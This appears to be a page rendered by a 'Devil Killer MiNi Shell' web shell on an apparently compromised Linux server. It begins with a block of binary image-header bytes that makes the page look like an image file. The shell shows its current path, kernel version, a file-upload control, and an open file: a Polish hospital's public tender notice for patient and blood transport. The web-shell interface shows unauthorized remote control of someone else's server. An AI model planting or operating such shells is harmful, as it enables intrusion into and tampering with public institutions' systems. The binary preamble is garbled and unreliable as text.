JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241129/0062513701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Postępowanie powtórzone: Świadczenie usług transportowych samochodami osobowymi i busami na rzecz WCSKJ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wojewódzkie Centrum Szpitalne Kotliny Jeleniogórskiej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000293640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ogińskiego 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jelenia Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-506</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@spzoz.jgora.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.spzoz.jgora.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Postępowanie powtórzone: Świadczenie usług transportowych samochodami osobowymi i busami na rzecz WCSKJ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8db2b611-d58e-46f2-a4af-01337a924f4b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00625137</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00234219/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Świadczenie usług transportowych samochodami osobowymi i busami na rzecz WCSKJ</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1024925 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/1024925</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja pomiędzy Zamawiającym<br/>a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się<br/>elektronicznie za pośrednictwem platformy zakupowej pod adresem: https://platformazakupowa.pl/transakcja/1005447 i<br/>formularza „Wyślij wiadomość” dostępnego na stronie dotyczącej postępowania. Dokumenty elektroniczne, oświadczenia lub<br/>elektroniczne kopie dokumentów lub oświadczeń przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym. Wykonawca jest zobowiązany przekazać dokumenty za<br/>pośrednictwem platformy zakupowej pod adresem: https://platformazakupowa.pl/transakcja/1024925.<br/>W przypadku gdy dokumenty elektroniczne w postępowaniu, przekazywane przy użyciu środków komunikacji elektronicznej,<br/>zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu<br/>nieuczciwej konkurencji (t.j. Dz. U. z 2023 r., poz. 1689 ze zm.), zwanej dalej: Ustawą znk, Wykonawca, w celu utrzymania w<br/>poufności tych informacji, przekazuje je zgodnie z zasadą określoną w pkt 11 SWZ. W przypadku przekazywania w postępowaniu<br/>dokumentu elektronicznego w formacie poddającym dane kompresji, opatrzenie pliku zawierającego skompresowany dokument<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, jest równoznaczne z opatrzeniem<br/>wszystkich dokumentów zawartych w tym pliku kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym.Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób, niż przy użyciu środków<br/>komunikacji elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny wynikający z art. 14 RODO wobec osób fizycznych, od których<br/>dane osobowe bezpośrednio lub pośrednio zostały pozyskane w celu ubiegania się o udzielenie zamówienia publicznego w<br/>niniejszym postępowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/PN/57/11/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> usługa transportu pacjentów:<br/>• do i ze Stacji Dializ, transport pacjentów do i z Wojewódzkiego Centrum Szpitalnego Kotliny Jeleniogórskiej ul. Ogińskiego<br/>6 w Jeleniej Górze w Jeleniej Górze,<br/>• do i z Zakładu Opiekuńczo – Leczniczego w Bolkowie ul. Wysokogórska 19, 59-420 Bolków,<br/>• do i ze Szpitala „Wysoka Łąka” w Kowarach, ul. Sanatoryjna 27, 58-530 Kowary,<br/>• transport dla potrzeb POZ (nocna i świąteczna pomoc medyczna),<br/>• przewóz krwi i preparatów krwiopochodnych, materiałów do badań, apteki, drobnego sprzętu, dokumentacji – loco miejsce<br/>wskazane przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60170000-0 - Wynajem pojazdów przeznaczonych do transportu osób wraz z kierowcą</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60120000-5 - Usługi taxi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu na wskazane miejsce</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca wykaże spełnienie warunków udziału w zamówieniu, gdy przedstawi dokument potwierdzający, że Wykonawca<br/>jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia<br/>ze wskazaniem sumy gwarancyjnej tego ubezpieczenia w wysokości minimum 100 000,00 zł.<br/>Wykonawca zobowiązuje się do ubezpieczenia OC z tytułu prowadzonej działalności gospodarczej związanej z<br/>przedmiotem umowy przez cały okres wykonywania umowy.<br/>Wykonawca jest zobowiązany utrzymać ubezpieczenie w zakresie odpowiedzialności cywilnej przez cały okres realizacji<br/>przedmiotu umowy. Jeżeli ubezpieczenie w zakresie odpowiedzialności cywilnej w tym okresie wygaśnie (upłynie okres<br/>obowiązywania) Wykonawca wykupi nowe ubezpieczenie OC i przedłoży je Zamawiającemu, co najmniej na 7 dni wcześniej<br/>niż utrata ważności poprzedniego ubezpieczenia.<br/>4. Zdolności technicznej lub zawodowej<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca:<br/>1) przedłoży wykaz o dysponowaniu potencjałem technicznym zapewniającym właściwą realizację przedmiotu zamówienia,<br/>którego wzór stanowi Załącznik Nr 5.2 do SWZ. Wykonawca wykaże iż dysponuje sprawnymi technicznie środkami<br/>transportu drogowego do przewozu osób (tj. dysponuje minimum 7 samochodami osobowymi oraz minimum 3 busami<br/>minimum 6 osobowymi). Wykonawca musi zapewnić odpowiednią ilość środków transportu niezbędną do prawidłowej<br/>organizacji dowozu dla wszystkich osób uprawnionych do dowożenia. Wszystkie środki transportu przeznaczone do<br/>realizacji przedmiotu zamówienia, muszą posiadać aktualne badania techniczne dopuszczające pojazdy do ruchu oraz<br/>polisy ubezpieczenia OC i NNW.<br/>2) przedłoży wykaz osób i podmiotów uczestniczących w realizacji zamówienia, którego wzór stanowi Załącznik Nr 5.1 do<br/>SWZ<br/>4) przedłoży wykaz co najmniej 1 usługi transportowej o wartości min. 150 000,00 zł brutto wykonanych, a w przypadku<br/>świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert<br/>albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały<br/>wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz<br/>którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z<br/>uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie<br/>wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu<br/>składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; którego wzór stanowi Załącznik Nr 7 do SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy,<br/>w zakresie wskazanym w (art. 108 ust. 1 Ustawy PZP), o braku przynależności do tej samej grupy kapitałowej (w rozumieniu ustawy<br/>z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r., poz. 594 z późn. zm.), z innym Wykonawcą,<br/>który złożył odrębną ofertę w postępowaniu, albo oświadczenie<br/>3) Oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP - Załącznik Nr 4.3<br/>do SWZ<br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej. Oświadczenie Wykonawca może sporządzić zgodnie<br/>ze wzorem stanowiącym Załącznik nr 4.1. do SWZ. Dokument lub oświadczenie, sporządzane w języku obcym należy złożyć wraz z<br/>tłumaczeniem na język polski. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym<br/>wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. W przypadku Wykonawców<br/>występujących wspólnie oświadczenie, o których mowa w zdaniu pierwszym, składa każdy z Wykonawców.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji<br/>o działalności gospodarczej w zakresie art. 109 ust. 1 pkt 4 ustawy PZP, sporządzony nie wcześniej niż 3 miesiące przed ich<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>3) Oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP - Załącznik Nr 4.3<br/>do SWZ<br/>podjęcie działalności gospodarczej w zakresie objętym zamówieniem.<br/>5) Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia w wysokości minimum 100 000,00 zł.<br/>Wykonawca zobowiązuje się do ubezpieczenia OC z tytułu prowadzonej działalności gospodarczej związanej z przedmiotem umowy<br/>przez cały okres wykonywania umowy.<br/>Wykonawca jest zobowiązany utrzymać ubezpieczenie w zakresie odpowiedzialności cywilnej przez cały okres realizacji przedmiotu<br/>umowy. Jeżeli ubezpieczenie w zakresie odpowiedzialności cywilnej w tym okresie wygaśnie (upłynie okres obowiązywania)<br/>Wykonawca wykupi nowe ubezpieczenie OC i przedłoży je Zamawiającemu, co najmniej na 7 dni wcześniej niż utrata ważności<br/>poprzedniego ubezpieczenia.<br/>7) Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich<br/>3 lat, licząc od dnia złożenia oferty, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Wykonawca powinien<br/>wykazać wykonanie co najmniej 1 usługi o wartości minimum: 150 000,00 zł brutto wraz z podaniem ich wartości, przedmiotu, dat<br/>wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane. Do wykazu należy dołączyć dowody<br/>potwierdzające, czy te usługi zostały wykonane lub są wykonywane należycie. Dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub<br/>ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów -<br/>oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy,<br/>którego wzór stanowi Załącznik Nr 7 do SWZ<br/>8) Wykaz osób i podmiotów uczestniczących w realizacji zamówienia – Załącznik Nr 5.1<br/>9) Wykaz o dysponowaniu potencjałem technicznym zapewniającym właściwą realizację przedmiotu zamówienia. Wykonawca<br/>wykaże, iż dysponuje sprawnymi technicznie środkami transportu drogowego do przewozu osób (tj. dysponuje minimum 7<br/>samochodami osobowymi oraz minimum 3 busami minimum 6 osobowymi). Wykonawca musi zapewnić odpowiednią ilość środków<br/>transportu niezbędną do prawidłowej organizacji dowozu dla wszystkich osób uprawnionych do dowożenia. Wszystkie środki<br/>transportu przeznaczone do realizacji przedmiotu zamówienia, muszą posiadać aktualne badania techniczne dopuszczające pojazdy<br/>do ruchu oraz polisy ubezpieczenia OC i NNW – Załącznik Nr 5.2</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia dokumentów przedmiotowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca zobowiązany jest złożyć następujące dokumenty wraz z ofertą:<br/>1) Załącznik Nr 1 – Opis przedmiotu zamówienia wraz z formularzem cenowym<br/>2) Załącznik Nr 2 Formularz oferty zarejestrowaną nazwę Wykonawcy, zarejestrowany adres Wykonawcy, województwo,<br/>powiat, numer telefonu, numer REGON, numer NIP, e – mail, adres strony internetowej, numer konta bankowego, dane<br/>osobowe i nr telefonu osoby upoważnionej do kontaktów;<br/>3) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Do oferty należy dołączyć oryginał pełnomocnictwa lub notarialnie potwierdzoną kopię;<br/>4) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawcy, złożone w oryginale, udzielone<br/>zgodnie z zasadami reprezentacji wskazanymi we właściwym rejestrze<br/>5) Dowód wniesienia wadium (w sposób określony w pkt. 13 SWZ).<br/>6) Oświadczenie o niepodleganiu wykluczeniu – Załącznik Nr 4.2 do SWZ.<br/>7) Oświadczenie Wykonawcy o zapoznaniu się z Instrukcją Dekontaminacji Karetki Transportowej oraz Standardową<br/>Procedurą Transfuzjologiczną – transport preparatów krwiopochodnych do Banku – Załącznik Nr 8 <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest wpłacić wadium w kwocie określonej dla danego pakietu, (przed upływem terminu składania<br/>ofert), na cały okres związania ofertą od upływu terminu składania ofert:<br/>Nr Pakietu Kwota wadium zł<br/>1- 13 985,00 zł <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcą może być osoba fizyczna, osoba prawna lub jednostka organizacyjna nieposiadająca osobowości prawnej oraz<br/>podmioty te występujące wspólnie. Podmioty występujące wspólnie (w rozumieniu art. 58 ustawy PZP) ponoszą solidarną<br/>odpowiedzialność prawną za ewentualne nienależyte wykonanie zamówienia.<br/>Informacja dotycząca wspólnego ubiegania się o udzielenie zamówienia oraz udziału podwykonawców<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia składając wspólną ofertę,<br/>w takim przypadku ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>2. Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia mogą być:<br/>• spółka cywilna – w rozumieniu przepisów art. 860-875 k.c.,<br/>• wykonawcy, którzy zawarli porozumienie w celu wspólnego ubiegania się<br/>o udzielenie zamówienia, nie będący spółką cywilną w rozumieniu przepisów k.c. np.:<br/>tak zwane „konsorcjum” dwóch lub więcej Wykonawców.<br/>3. Wykonawcy, którzy wspólnie ubiegają się o zamówienie, ustanawiają „Pełnomocnika” do:<br/>• reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego, albo<br/>• reprezentowania w postępowaniu i zawarcia umowy.<br/>W ofercie należy złożyć oryginał pełnomocnictwa lub notarialnie potwierdzoną kopię.<br/>4. W przypadku, gdy upełnomocnienie osoby (lub osób) działającej w imieniu Wykonawców<br/>wspólnie ubiegających się o zamówienie wynika z treści umowy zawartej pomiędzy<br/>Wykonawcami wspólnie ubiegających się o zamówienie, w ofercie składa się oryginał umowy lub notarialnie 